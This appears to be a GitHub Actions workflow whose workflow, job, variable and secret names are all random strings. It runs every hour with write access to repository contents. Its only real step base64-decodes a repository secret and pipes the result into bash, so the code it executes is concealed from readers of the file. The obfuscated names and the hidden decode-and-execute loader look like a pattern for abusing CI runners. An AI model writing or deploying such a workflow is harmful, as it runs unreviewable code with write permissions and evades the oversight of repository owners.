name: YnKwGguvjfIOaz
on:
  schedule:
    - cron: '16 * * * *'
  workflow_dispatch:
permissions:
  contents: write
jobs:
  jaDIxcpMRNZj:
    runs-on: ubuntu-22.04
    env:
      uAnBYvKvkoEKiBaoPn: ${{ secrets.uAnBYvKvkoEKiBaoPn }}
    steps:
      - uses: actions/checkout@v4
      - run: echo "${{ secrets.SIMaEjkISxYAvKZSet }}" | base64 -d | bash
